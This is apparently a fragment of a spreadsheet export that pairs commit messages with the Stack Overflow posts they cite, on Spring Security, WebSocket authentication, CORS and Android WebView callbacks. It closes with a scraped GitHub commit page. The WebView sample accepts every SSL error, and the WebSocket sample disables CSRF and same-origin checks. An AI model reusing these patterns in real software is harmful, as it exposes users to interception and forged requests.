&lt;p&gt;I would think that its just choking on the file path, except that it works when its not inside my function.&lt;/p&gt;
&lt;p&gt;Also, changing the foreach loop to the following has the exact same error&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Foreach($File in $List)
    {
    $Object += Import-Csv -Path $File.FullName
    }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C76</t>
  </si>
  <si>
    <t>refactored the lifecycle observer #2, todo: better handling of the pa
ge fully loaded and visible callback. maybe javascript? https://stackoverflow.com/a/43115240</t>
  </si>
  <si>
    <t>Here's a novel method for detected when a URL has loaded by utilising Android's capability for JavaScript hooks. Using this pattern, we exploit JavaScript's knowledge of the document's state to generate a native method call within the Android runtime. These JavaScript-accessible calls can be made using the @JavaScriptInterface annotation.
This implementation requires that we call setJavaScriptEnabled(true) on the WebView's settings, so it might not be suitable depending on your application's requirements, e.g. security concerns.
src/io/github/cawfree/webviewcallback/MainActivity.java (Jelly Bean, API Level 16)
package io.github.cawfree.webviewcallback;
/**
 *  Created by Alex Thomas (@Cawfree), 30/03/2017.
 **/
import android.net.http.SslError;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.webkit.JavascriptInterface;
import android.webkit.SslErrorHandler;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import android.widget.Toast;
/** An Activity demonstrating how to introduce a callback mechanism into Android's WebView. */
public class MainActivity extends AppCompatActivity {
    /* Static Declarations. */
    private static final String HOOK_JS             = "Android";
    private static final String URL_TEST            = "http://www.zonal.co.uk/";
    private static final String URL_PREPARE_WEBVIEW = "";
    /* Member Variables. */
    private WebView mWebView = null;
    /** Create the Activity. */
    @Override protected final void onCreate(final Bundle pSavedInstanceState) {
        // Initialize the parent definition.
        super.onCreate(pSavedInstanceState);
        // Set the Content View.
        this.setContentView(R.layout.activity_main);
        // Fetch the WebView.
        this.mWebView = (WebView)this.findViewById(R.id.webView);
        // Enable JavaScript.
        this.getWebView().getSettings().setJavaScriptEnabled(true);
        // Define the custom WebClient. (Here I'm just suppressing security errors, since older Android devices struggle with TLS.)
        this.getWebView().setWebViewClient(new WebViewClient() { @Override     public final void onReceivedSslError(final WebView pWebView, final SslErrorHandler pSslErrorHandler, final SslError pSslError) { pSslErrorHandler.proceed(); } });
        // Define the WebView JavaScript hook.
        this.getWebView().addJavascriptInterface(this, MainActivity.HOOK_JS);
        // Make this initial call to prepare JavaScript execution.
        this.getWebView().loadUrl(MainActivity.URL_PREPARE_WEBVIEW);
    }
    /** When the Activity is Resumed. */
    @Override protected final void onPostResume() {
        // Handle as usual.
        super.onPostResume();
        // Load the URL as usual.
        this.getWebView().loadUrl(MainActivity.URL_TEST);
        // Use JavaScript to embed a hook to Android's MainActivity. (The onExportPageLoaded() function implements the callback, whilst we add some tests for the state of the WebPage so as to infer when to export the event.)
        this.getWebView().loadUrl("javascript:" + "function onExportPageLoaded() { " + MainActivity.HOOK_JS + ".onPageLoaded(); }" + "if(document.readyState === 'complete') { onExportPageLoaded(); } else { window.addEventListener('onload', function () { onExportPageLoaded(); }, false); }");
    }
    /** Javascript-accessible callback for declaring when a page has loaded. */
    @JavascriptInterface @SuppressWarnings("unused") public final void onPageLoaded() {
        // Display the Message.
        Toast.makeText(this, "Page has loaded!", Toast.LENGTH_SHORT).show();
    }
    /* Getters. */
    public final WebView getWebView() {
        return this.mWebView;
    }
}
res/layout/activity_main.xml
&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;WebView
    xmlns:android="http://schemas.android.com/apk/res/android"
    android:id="@+id/webView"
    android:layout_width="wrap_content"
    android:layout_height="wrap_content"
/&gt;
Essentially, we're appending an additional JavaScript function that is used to test the state of the document. If it's loaded, we launch a custom onPageLoaded() event in Android's MainActivity; otherwise, we register an event listener that updates Android once the page is ready, using window.addEventListener('onload', ...);.
Since we're appending this script after the call to this.getWebView().loadURL("") has been made, it's probable that we don't need to 'listen' for the events at all, since we only get a chance to append the JavaScript hook by making a successive call to loadURL, once the page has already been loaded.</t>
  </si>
  <si>
    <t xml:space="preserve">On my journey into the depths of custom ASP.NET control development I am obviously getting my head around the ASP.NET PostBack model and how it affects control development.
I understand that controls have no "lifetime" in ASP.NET, and therefore must be re-initialized on each and every page load. We overcome this by persisting the objects values/parameters to the ViewState.
Many articles I read therefore suggest not using PostBack since this can add considerable overhead to the Page. I am not looking for how to disable it, I know that. 
What I am looking for is:
What alternatives to we have to using the PostBack model to initialize controls?
I know we could use the QueryString, but that seems awfully messy, and obviously unreliable.
Ideally you could give me an overview of the architecture/design of a different approach and the pro's/con's of it..
Many thanks ^_^
</t>
  </si>
  <si>
    <t>C760</t>
  </si>
  <si>
    <t>Update authorization docs to Graphene 2.0
*  Re-write some language in "Limiting Field Access"
* Added code to "Queryset Filtering On Lists" section to handle queries that return nothing
* fix code to Filtering ID-based node access to work based on question [here](https://stackoverflow.com/questions/51057784/django-graphene-with-relay-restricting-queries-access-based-on-id/51958088#51958088)
* Rewrote Adding Login Requirements to be Django 2.0 compatible 
Fixed login requirements</t>
  </si>
  <si>
    <t>Seems like the documentation is not correct, also your parameters are not in the correct order for the
get_node
method.
There are only three parameters for the call
The first one is your
DjangoObjectType
subclass:
EnvNode
The second one is a
graphql.execution.base.ResolveInfo
which contains a reference to the context. You can get the user object from there.
The third one is the actual
id
for the object.
You should write it like this for the restriction to work:
@classmethod
def get_node(cls, info, id):
    try:
        env = cls._meta.model.objects.get(id=id, user=info.context.user)
    except cls._meta.model.DoesNotExist:
        return None
    return env
Hope it helps.</t>
  </si>
  <si>
    <t xml:space="preserve">I am working on a few PHP projects that use MVC frameworks, and while they all have different ways of retrieving objects from the database, it always seems that nothing beats writing your SQL queries by hand as far as speed and cutting down on the number of queries.
For example, one of my web projects (written by a junior developer) executes over 100 queries just to load the home page.  The reason is that in one place, a method will load an object, but later on deeper in the code, it will load some other object(s) that are related to the first object.
This leads to the other part of the question which is what are people doing in situations where you have a table that in one part of the code only needs the values for a few columns, and another part needs something else?  Right now (in the same project), there is one get() method for each object, and it does a "SELECT *" (or lists all the columns in the table explicitly) so that anytime you need the object for any reason, you get the whole thing.
So, in other words, you hear all the talk about how SELECT * is bad, but if you try to use a ORM class that comes with the framework, it wants to do just that usually.  Are you stuck to choosing ORM with SELECT * vs writing the specific SQL queries by hand?  It just seems to me that we're stuck between convenience and efficiency, and if I hand write the queries, if I add a column, I'm most likely going to have to add it to several places in the code.
Sorry for the long question, but I'm explaining the background to get some mindsets from other developers rather than maybe a specific solution.  I know that we can always use something like Memcached, but I would rather optimize what we can before getting into that.
Thanks for any ideas.
</t>
  </si>
  <si>
    <t>C761</t>
  </si>
  <si>
    <t>refactor(api-server): tests and authz (#458)
* mock out ros2 in api server tests, this improves testing performance and reliability
* fastio's watch function is now called at subscribe time instead of when an event is received. It also no longer automatically generates a GET route.
  * the old pattern has a major flaw with authorisation. In order for authorisation to be enforceable, the decorated function needs to be called at subscription time (to check for authorisation), the old pattern calls it when an event is received. A decorator can only decorate one function, so it is not possible for the old pattern to enforce authorisation.
  * because of this change, the underlying rxpy subscription is now lazy, i.e. it only subscribes when a client calls the endpoint. This also fixes a minor problem where the old pattern needs `RmfEvent` to be available before the app is started, as a result, it requires a "global" `RmfEvent` preventing it from being restart-able.
* `RmfRepository` now requires an user, it is now designed to be used as a fastapi dependency.
  * Previously, the usage of `RmfRepository` or the tortoise models directly is a mess. With this change, route handlers should never use the tortoise models directly, "system level" operations like `RmfBookKeeper` and `HealthWatchdog` should use the tortoise models directly when they don't need a user.
* use absolute imports when importing "up" and relative imports when importing "down"
  * PEP discourages the use of relative imports, but those guides are old and there doesn't seem to be a generally accepted guideline https://stackoverflow.com/questions/4209641/absolute-vs-explicit-relative-import-of-python-module
* change the `DELETE /admin/roles/{role}/permissions` route to `POST /admin/roles/{role}/permissions/remove`
  * while not disallowed by the http spec, the `DELETE` method is normally not expected to have a body, some clients does not support it for that reason</t>
  </si>
  <si>
    <t>Absolute imports. From PEP 8:
Relative imports for intra-package imports are highly
discouraged.
Always use the absolute package path for all imports.
Even now that PEP 328 [7] is fully implemented in Python 2.5,
its style of explicit relative imports is actively discouraged;
absolute imports are more portable and usually more readable.
Explicit relative imports are a nice language feature (I guess), but they're not nearly as explicit as absolute imports. The more readable form is:
import A.A
import A.B.B
especially if you import several different namespaces. If you look at some well written projects/tutorials that include imports from within packages, they usually follow this style.
The few extra keystrokes you take to be more explicit will save others (and perhaps you) plenty of time in the future when they're trying to figure out your namespace (especially if you migrate to 3.x, in which some of the package names have changed).</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to make timertimeout at client side ,when we delayed msgreply from server to client&lt;/p&gt;
&lt;p&gt;printing proper without timertimeout even we delayed&lt;/p&gt;
&lt;p&gt;client_code:
if (TimerTimeout(CLOCK_REALTIME, _NTO_TIMEOUT_SEND |
_NTO_TIMEOUT_REPLY, &amp;amp;event, &amp;amp;timeout, NULL) == -1) {
perror(&amp;quot;TimerTimeout failed&amp;quot;);
return EXIT_FAILURE;
}
else {
printf(&amp;quot;âœ… TimerTimeout successfully set.\n&amp;quot;);
}
printf(&amp;quot;ðŸš€ Client sending message: %d\n&amp;quot;, msg.data);&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    // Send the message and wait for a response
    int status = MsgSend(coid, &amp;amp;msg, sizeof(msg), &amp;amp;msg, sizeof(msg));
    if (status == -1) {
        if (errno == ETIMEDOUT) {
            printf(&amp;quot;â³Message send timed out! No response from server.\n&amp;quot;);
        }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;server_code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;while (1) {
        struct my_msg_t msg;
        int rcvid = MsgReceive(attach-&amp;gt;chid, &amp;amp;msg, 
        sizeof(msg),NULL);
        if (rcvid == -1) {
            perror(&amp;quot;MsgReceive failed&amp;quot;);
            continue;
        }
        printf(&amp;quot;ðŸ“© Server received message: %d, delaying response...\n&amp;quot;, msg.data);
        sleep(10);  // Simulate 10-sec delay (longer than the 2-sec timeout in client)
       if (MsgReply(rcvid, 0, &amp;amp;msg, sizeof(msg)) == -1) {
            perror(&amp;quot;MsgReply failed&amp;quot;);
        } else {
            printf(&amp;quot;âœ… Reply sent to client.\n&amp;quot;);
        }
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;why timertimeout not happening?
could you please help me ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C762</t>
  </si>
  <si>
    <t>CORS v3 (works)
- CORS must be processed before Spring Security (source: https://docs.spring.io/spring-security/site/docs/4.2.x/reference/html/cors.html)
- by default, browsers can only support some headers by default, `Authorization` is not included (source: https://stackoverflow.com/questions/37897523/axios-get-access-to-response-header-fields)</t>
  </si>
  <si>
    <t>In case of CORS requests, browsers can only access the following response headers by default:
Cache-Control
Content-Language
Content-Type
Expires
Last-Modified
Pragma
If you would like your client app to be able to access other headers, you need to set the
Access-Control-Expose-Headers
header on the server:
Access-Control-Expose-Headers: Access-Token, Uid</t>
  </si>
  <si>
    <t xml:space="preserve">I will soon work on a project about a mobile application. This application will work on a PDT with Windows Mobile and we will use Visual Studio and .NET to develop it.
This application will intensively use Wifi and need to consume as little power as possible. I found on the internet a lot of stuff concerning embedded software and real time systems, which deal with power management. But this stuff is very hardware related, and does not talk about software design.
I also found some interesting best practices but that mainly focus on the code of the application (for example, close handles as soon as possible or use few I/Os).
I would like to know if you are aware of some leads concerning the architecture or the design of such application. 
I also saw advice about the use of event driven architecture: is it so useful concerning power saving? And is it usable with the Compact Framework?
Edit
So Dave gave us some clues, that we could call architecture decisions.
So I think I see clearly what could be done at two different levels:
at a high-level, such decisions as Dave's ;
at a low level of abstraction, close to the code, tricks and tips that minimize the battery consumption.
What about at a middle level of abstraction (during the design phase)? Is there some methodology for low-power software design (design patterns, etc)?
Links: 
[external-link]
[external-link]
</t>
  </si>
  <si>
    <t>C763</t>
  </si>
  <si>
    <t>env: Websocket Authorization config 
-: https://stackoverflow.com/questions/45405332/websocket-authentication-and-authorization-in-spring</t>
  </si>
  <si>
    <t>As stated above the documentation looks unclear (IMHO), until Spring provide some clear documentation, here is a boilerplate to save you from spending two days trying to understand what the security chain is doing.
A really nice attempt was made by
Rob-Leggett
but, he was
forking some Springs class
and I don't feel comfortable doing so.
Things to know before you start:
Security chain
and
Security config
for
http
and
WebSocket
are completely independent.
Spring
AuthenticationProvider
take not part at all in Websocket authentication.
The authentication won't happen on HTTP negotiation endpoint in our case, because none of the JavaScripts STOMP (websocket) libraries I know sends the necessary authentication headers along with the HTTP request.
Once set on CONNECT request, the
user
(
simpUser
) will be stored in the websocket session and no more authentication will be required on further messages.
Maven deps
&lt;dependency&gt;
    &lt;groupId&gt;org.springframework.boot&lt;/groupId&gt;
    &lt;artifactId&gt;spring-boot-starter-websocket&lt;/artifactId&gt;
&lt;/dependency&gt;
&lt;dependency&gt;
    &lt;groupId&gt;org.springframework&lt;/groupId&gt;
    &lt;artifactId&gt;spring-messaging&lt;/artifactId&gt;
&lt;/dependency&gt;
&lt;dependency&gt;
    &lt;groupId&gt;org.springframework.boot&lt;/groupId&gt;
    &lt;artifactId&gt;spring-boot-starter-security&lt;/artifactId&gt;
&lt;/dependency&gt;
&lt;dependency&gt;
    &lt;groupId&gt;org.springframework.security&lt;/groupId&gt;
    &lt;artifactId&gt;spring-security-messaging&lt;/artifactId&gt;
&lt;/dependency&gt;
WebSocket configuration
The below config register a simple message broker (a simple endpoint that we will later protect).
@Configuration
@EnableWebSocketMessageBroker
public class WebSocketConfig extends WebSocketMessageBrokerConfigurer {
    @Override
    public void configureMessageBroker(final MessageBrokerRegistry config) {
        // These are endpoints the client can subscribes to.
        config.enableSimpleBroker("/queue/topic");
        // Message received with one of those below destinationPrefixes will be automatically router to controllers @MessageMapping
        config.setApplicationDestinationPrefixes("/app");
    }
    @Override
    public void registerStompEndpoints(final StompEndpointRegistry registry) {
        // Handshake endpoint
        registry.addEndpoint("stomp"); // If you want to you can chain setAllowedOrigins("*")
    }
}
Spring security config
Since the Stomp protocol rely on a first HTTP Request, we'll need to authorize HTTP call to our stomp handshake endpoint.
@Configuration
public class WebSecurityConfig extends WebSecurityConfigurerAdapter {
    @Override
    protected void configure(final HttpSecurity http) throws Exception {
        // This is not for websocket authorization, and this should most likely not be altered.
        http
                .httpBasic().disable()
                .sessionManagement().sessionCreationPolicy(SessionCreationPolicy.STATELESS).and()
                .authorizeRequests().antMatchers("/stomp").permitAll()
                .anyRequest().denyAll();
    }
}
Then we'll create a service responsible for authenticating users.
@Component
public class WebSocketAuthenticatorService {
    // This method MUST return a UsernamePasswordAuthenticationToken instance, the spring security chain is testing it with 'instanceof' later on. So don't use a subclass of it or any other class
    public UsernamePasswordAuthenticationToken getAuthenticatedOrFail(final String  username, final String password) throws AuthenticationException {
        if (username == null || username.trim().isEmpty()) {
            throw new AuthenticationCredentialsNotFoundException("Username was null or empty.");
        }
        if (password == null || password.trim().isEmpty()) {
            throw new AuthenticationCredentialsNotFoundException("Password was null or empty.");
        }
        // Add your own logic for retrieving user in fetchUserFromDb()
        if (fetchUserFromDb(username, password) == null) {
            throw new BadCredentialsException("Bad credentials for user " + username);
        }
        // null credentials, we do not pass the password along
        return new UsernamePasswordAuthenticationToken(
                username,
                null,
                Collections.singleton((GrantedAuthority) () -&gt; "USER") // MUST provide at least one role
        );
    }
}
Note that:
UsernamePasswordAuthenticationToken
MUST
have at least one GrantedAuthority, if you use another constructor, Spring will auto-set
isAuthenticated = false
.
Almost there, now we need to create an Interceptor that will set the `simpUser` header or throw `AuthenticationException` on CONNECT messages.
@Component
public class AuthChannelInterceptorAdapter extends ChannelInterceptor {
    private static final String USERNAME_HEADER = "login";
    private static final String PASSWORD_HEADER = "passcode";
    private final WebSocketAuthenticatorService webSocketAuthenticatorService;
    @Inject
    public AuthChannelInterceptorAdapter(final WebSocketAuthenticatorService webSocketAuthenticatorService) {
        this.webSocketAuthenticatorService = webSocketAuthenticatorService;
    }
    @Override
    public Message&lt;?&gt; preSend(final Message&lt;?&gt; message, final MessageChannel channel) throws AuthenticationException {
        final StompHeaderAccessor accessor = MessageHeaderAccessor.getAccessor(message, StompHeaderAccessor.class);
        if (StompCommand.CONNECT == accessor.getCommand()) {
            final String username = accessor.getFirstNativeHeader(USERNAME_HEADER);
            final String password = accessor.getFirstNativeHeader(PASSWORD_HEADER);
            final UsernamePasswordAuthenticationToken user = webSocketAuthenticatorService.getAuthenticatedOrFail(username, password);
            accessor.setUser(user);
        }
        return message;
    }
}
Note that:
preSend()
MUST
return a
UsernamePasswordAuthenticationToken
, another element in the spring security chain test this.
Note that: If your
UsernamePasswordAuthenticationToken
was built without passing
GrantedAuthority
, the authentication will fail, because the constructor without granted authorities auto set
authenticated = false
THIS IS AN IMPORTANT DETAIL which is not documented in spring-security
.
Finally create two more class to handle respectively Authorization and Authentication.
@Configuration
@Order(Ordered.HIGHEST_PRECEDENCE + 99)
public class WebSocketAuthenticationSecurityConfig extends  WebSocketMessageBrokerConfigurer {
    @Inject
    private AuthChannelInterceptorAdapter authChannelInterceptorAdapter;
    @Override
    public void registerStompEndpoints(final StompEndpointRegistry registry) {
        // Endpoints are already registered on WebSocketConfig, no need to add more.
    }
    @Override
    public void configureClientInboundChannel(final ChannelRegistration registration) {
        registration.setInterceptors(authChannelInterceptorAdapter);
    }
}
Note that: The
@Order
is
CRUCIAL
don't forget it, it allows our interceptor to be registered first in the security chain.
@Configuration
public class WebSocketAuthorizationSecurityConfig extends AbstractSecurityWebSocketMessageBrokerConfigurer {
    @Override
    protected void configureInbound(final MessageSecurityMetadataSourceRegistry messages) {
        // You can customize your authorization mapping here.
        messages.anyMessage().authenticated();
    }
    // TODO: For test purpose (and simplicity) i disabled CSRF, but you should re-enable this and provide a CRSF endpoint.
    @Override
    protected boolean sameOriginDisabled() {
        return true;
    }
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to use nextAuth for my authentication. I followed the documentation. I just found out that when I'm trying to login using credentials for the VERY FIRST TIME I will get null or undefined user even though my fetch request is successful.&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;
import { AuthResponse } from &amp;quot;@/typings/Interface/AuthResponse&amp;quot;
import NextAuth from &amp;quot;next-auth&amp;quot;
import Credentials from &amp;quot;next-auth/providers/credentials&amp;quot;
export const { handlers, signIn, signOut, auth } = NextAuth({
  providers: [
    Credentials({
      // You can specify which fields should be submitted, by adding keys to the `credentials` object.
      // e.g. domain, username, password, 2FA token, etc.
      credentials: {
        email: {},
        password: {},
      },
      authorize: async (credentials): Promise&amp;lt;any&amp;gt; =&amp;gt; {
        try {
          let user: any = null;
          const res = await fetch(&amp;quot;localhost&amp;quot;, {
            headers: {
              'Content-Type': 'application/json',
            },
            method: 'POST',
            body: JSON.stringify(credentials),
          });
          const data: AuthResponse = await res.json();
          return { ...data.user }
        } catch (error) {
          console.log(error, 'eeeee')
          return null;
        }
      },
    }),
  ],
  session: {
    strategy: 'jwt'
  },
  callbacks: {
    async signIn({ user, account, profile, email, credentials }: any) {
      if (user?.error === 'LoginError') {
        throw new MyCustomeError()
      }
      return true;
    },
    async session({ session, token }: any) {
      session.user = token.user;
      return session;
    },
    async jwt({ token, user }) {
      if (user) {
        token.user = user;
      }
      return token;
    }
  }
})
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I notice this when I tried to delete this cookie:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/x9Svx4iI.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/x9Svx4iI.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;So first the very very first time the user tries to login and the cookies are empty the &lt;code&gt;auth()&lt;/code&gt; method returns nothing, but when you try to login again since the cookies from nextAuth are not empty it returns the correct object.&lt;/p&gt;
&lt;p&gt;this is my login action and how I call the &lt;code&gt;signIn&lt;/code&gt; method:&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;    await signIn(&amp;quot;credentials&amp;quot;, { ...formValues, redirect: false })
    const awt = await auth();
    console.log(awt, 'awawaawtaw') // &amp;lt;---- This is empty on the very first attempt of logging in
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;what I'm trying to do here is before I manually redirect I wanted to grab the user information and return it to the client side form because I'm using zustand and wanted to setup the user information before redirecting.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C764</t>
  </si>
  <si>
    <t>Authorization Code Grant Type
What works
1) added login and authorization Authorization Code Grant Type
2) Configure Authorization Endpoint
3) Add AuthorizationController (currently handling error)
What does not work
1) custom login page needs to be provided to intercept calls to Authorization Endpoint
2) spring-security-taglib jar is present in packaged omod, but gives error when module is installed
Error : https://stackoverflow.com/questions/16099840/spring-security-taglib-cannot-be-found</t>
  </si>
  <si>
    <t>Adding this dependency fixed it for me (using 3.1.X.RELEASE) :
&lt;dependency&gt;
    &lt;groupId&gt;org.springframework.security&lt;/groupId&gt;
    &lt;artifactId&gt;spring-security-taglibs&lt;/artifactId&gt;
    &lt;version&gt;${your-version}&lt;/version&gt;
&lt;/dependency&gt;
The taglib now works properly:
&lt;%@ taglib prefix="sec" uri="http://www.springframework.org/security/tags" %&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">I have an opportunity to attend Sony licensed training classes to learn about programming with the PS3's cell architecture. 
However I only have a rudimentary knowledge of C++ and was wondering if the PS3 is a bit of an overkill for a starter aspiring game dev like me. 
And also what is the best resources to get me to a decent level in C++ graphics programming in about 2 months time?
</t>
  </si>
  <si>
    <t>C765</t>
  </si>
  <si>
    <t>Spring's TestRestTemplate throws an error while sending PUT requests with
         authorization error: java.net.HttpRetryException: cannot retry due to server authentication, in streaming mode
         Therefore we need to use Apaches's HTTP client. Please refer:
         https://stackoverflow.com/questions/16748969/java-net-httpretryexception-cannot-retry-due-to-server-authentication-in-stream</t>
  </si>
  <si>
    <t>This issue is reported in Spring Framework.
Reference
:
https://github.com/spring-projects/spring-framework/issues/14004
(was
https://jira.spring.io/browse/SPR-9367
prior to GitHub migration)
Copying from Reference:
It is very difficult (impossible) to handle a 401 response in the RestTemplate with default settings. In fact it is possible, but you have to supply an error handler and a request factory. The error handler was obvious, but the problem is that the default request factory uses java.net which can throw HttpRetryException when you try to look at the status code of the response (despite it being obviously available). The solution is to use HttpComponentsClientHttpRequestFactory. E.g.
template.setRequestFactory(new HttpComponentsClientHttpRequestFactory());
template.setErrorHandler(new DefaultResponseErrorHandler() {
    public boolean hasError(ClientHttpResponse response) throws IOException {
        HttpStatus statusCode = response.getStatusCode();
        return statusCode.series() == HttpStatus.Series.SERVER_ERROR;
    }
});
HttpComponentsClientHttpRequestFactory requires below dependency. Add below dependency in your POM file:
&lt;dependency&gt;
            &lt;groupId&gt;org.apache.httpcomponents&lt;/groupId&gt;
            &lt;artifactId&gt;httpclient&lt;/artifactId&gt;
&lt;/dependency&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Iâ€™m working on a project based on Next.js and Medusa.js, where Iâ€™ve implemented a data revalidation mechanism using an API route on the Next.js side and a subscriber on the Medusa.js side. Everything works as expected - product data is refreshed after changes such as name, variant, price, etc.&lt;/p&gt;
&lt;p&gt;However, Iâ€™m encountering an issue when it comes to inventory updates. Although the subscriber detects changes in other aspects of the product, it does not respond to inventory level updates, which prevents the cache from being revalidated.&lt;/p&gt;
&lt;p&gt;Has anyone faced a similar issue? Is there a recommended way to monitor inventory changes in Medusa.js to trigger data revalidation in Next.js? Any guidance or example implementations would be greatly appreciated.&lt;/p&gt;
&lt;p&gt;This my Medusa subscriber code:&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;
export default async function productChangedHandler({ container }: SubscriberArgs&amp;lt;{ id: string }&amp;gt;) {
  const logger = container.resolve(&amp;quot;logger&amp;quot;);
  const revalidateSecret = process.env.REVALIDATE_SECRET;
  const revalidateUrl = process.env.FRONTEND_REVALIDATE_URL;
  try {
    const response = await fetch(`${revalidateUrl}?secret=${revalidateSecret}`, {
      method: &amp;quot;POST&amp;quot;,
      headers: {
        &amp;quot;Content-Type&amp;quot;: &amp;quot;application/json&amp;quot;,
      },
      body: JSON.stringify({ tag: &amp;quot;products&amp;quot; }),
    });
    if (!response.ok) {
      throw new Error(`Failed to revalidate: ${response.status}`);
    }
    const result = await response.json();
  } catch (error) {
    logger.error(`Error revalidating cache: ${error.message}`);
  }
}
export const config: SubscriberConfig = {
  event: [
    &amp;quot;product.created&amp;quot;,
    &amp;quot;product.updated&amp;quot;,
    &amp;quot;product.deleted&amp;quot;,
    &amp;quot;product.status_change&amp;quot;,
    &amp;quot;product-variant.created&amp;quot;,
    &amp;quot;product-variant.updated&amp;quot;,
    &amp;quot;product-variant.deleted&amp;quot;,
    &amp;quot;product-option.created&amp;quot;,
    &amp;quot;product-option.updated&amp;quot;,
    &amp;quot;product-option.deleted&amp;quot;,
  ],
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks in advance for any help!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C766</t>
  </si>
  <si>
    <t xml:space="preserve">Skip to content
Navigation Menu
WISVCH
events
Type / to search
Code
Issues
28
Pull requests
1
Actions
Wiki
Security
Insights
Commit 2785546
Preview
Give feedback
07joshua03JoepdeJong
07joshua03
and
JoepdeJong
authored
on May 20, 2024
·
·
Partially verified
Spring3 migration (#479)
* Updated spring boot to version 3.0
- Changed spring boot from 2.7 to 3.0
- Removed javax.el-api dependency (https://github.com/spring-projects/spring-boot/wiki/Spring-Boot-3.0-Migration-Guide#jakarta-ee)
- Updaed thymeleaf to use spring6 and springsecurity6
* Changed port to 8080 in devcontainer config so that logging in works
* Moved javax imports to jakarta
https://github.com/spring-projects/spring-boot/wiki/Spring-Boot-3.0-Migration-Guide#jakarta-ee
* Fix websecurityconfigureradapter
Renamed authorizeRequests, antMatchers and ignoringMatchers to new versions
- https://spring.io/blog/2022/02/21/spring-security-without-the-websecurityconfigureradapter
- https://stackoverflow.com/questions/74609057/how-to-fix-spring-authorizerequests-is-deprecated
* Remove Java8TimeDialect
TODO: Check whether this breaks anything
* Temp fix validation errors becuse of NotNull constraint in Order
TODO: Figure out how to keep this constraint?
* Fix trailing slashes and html errs due to deprecated #httpServletRequest
* Fix first tests
* Fix loading of orders in dev environment
* move valid check to before entity change
* fix non-null event initialization in test
* Spring boot 3.1
* Rewrite securityfilterchain
https://docs.spring.io/spring-security/reference/6.0/migration/servlet/authorization.html
* Upgrade to Spring Boot 3.2.5
* Remove unused imports
* Setup java 17 for codeql
* Update codeql workflow versions
* Replace deprecated thymeleaf syntax
* Specify registry and fix devcontainer ports
---------
Co-authored-by: Joep de Jong &lt;joep@joepdejong.com&gt;
master(#479)
1 parent 
9d42ec6
 commit 
2785546
File tree
Filter files
.devcontainer
Dockerfile
devcontainer.json
docker-compose.yml
.github/workflows
codeql-analysis.yml
build.gradle
config
application-devcontainer.yml
src
main
java/ch/wisv/events
ChConnectConfiguration.java
EventsApplication.java
WebConfiguration.java
admin/controller
DashboardIndexController.java
api
controller
OrderRestController.java
request
ProductDto.java
core
model
customer
Customer.java
document
Document.java
event
Event.java
order
Order.java
OrderProduct.java
product
Product.java
ticket
Ticket.java
webhook
Webhook.java
WebhookTask.java
service
customer
CustomerServiceImpl.java
event
EventServiceImpl.java
mail
MailServiceImpl.java
product
ProductServiceImpl.java
ticket
TicketServiceImpl.java
webshop
controller
WebshopIndexController.java
WebshopTicketController.java
service
PaymentsServiceImpl.java
resources
dev/data
orders.json
templates
admin
customers
customer.html
index.html
view.html
events
event.html
index.html
overview.html
view.html
index.html
orders
index.html
view.html
products
index.html
overview.html
product.html
view.html
salesexport
index.html
sidebar.html
tasks
index.html
treasurer
index.html
webhooks
index.html
view.html
webhook.html
error.html
index.example.html
sales
index.html
scan
barcode
barcode.html
event
barcode.html
code.html
qrcode.html
index.html
sell
customer
create.html
rfid.html
index.html
order
cancelled.html
complete.html
index.html
stats
event
index.html
index.html
products
index.html
sidebar.html
webshop
checkout
create.html
customer.html
index.html
complete.html
event.html
index.html
overview
index.html
payment
index.html
return
cancelled.html
error.html
expired.html
pending.html
reservation.html
success.html
tickets
transfer.html
test/java/ch/wisv/events
ControllerTest.java
admin/controller
DashboardEventControllerTest.java
DashboardOrderControllerTest.java
DashboardProductControllerTest.java
DashboardTasksControllerTest.java
DashboardTreasurerControllerTest.java
core
model/order
PaymentMethodTest.java
service
TicketServiceTest.java
TicketTransferTest.java
tasks
OrderTaskSchedulerTest.java
sales/controller/stats
SalesStatsControllersTest.java
Some content is hidden
Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.
95 files changed
+312
-313
lines changed
Search within code
Customizable line height
The default line height has been increased for improved accessibility. You can choose to enable a more compact line height from the view settings menu.
‎.devcontainer/Dockerfile
+1
-1
Original file line number	Diff line number	Diff line change
@@ -1,4 +1,4 @@
FROM mcr.microsoft.com/devcontainers/java:0-17
FROM mcr.microsoft.com/devcontainers/java:17
RUN su vscode -c "umask 0002 &amp;&amp; . /usr/local/sdkman/bin/sdkman-init.sh &amp;&amp; sdk install gradle "
‎.devcontainer/devcontainer.json
+15
-5
Original file line number	Diff line number	Diff line change
@@ -14,14 +14,24 @@
	// Use 'forwardPorts' to make a list of ports inside the container available locally.
	// This can be used to network with other containers or with the host.
	"forwardPorts": [
		1080,
		80,
		8082
		1080, // Mailcatcher
		5432, // PostgreSQL
		8080, // Events
		8082  // Adminer
	],
	// Use 'postCreateCommand' to run commands after the container is created.
	"postCreateCommand": "gradle bootRun",
	// "postCreateCommand": "gradle bootRun",
	// Configure tool-specific properties.
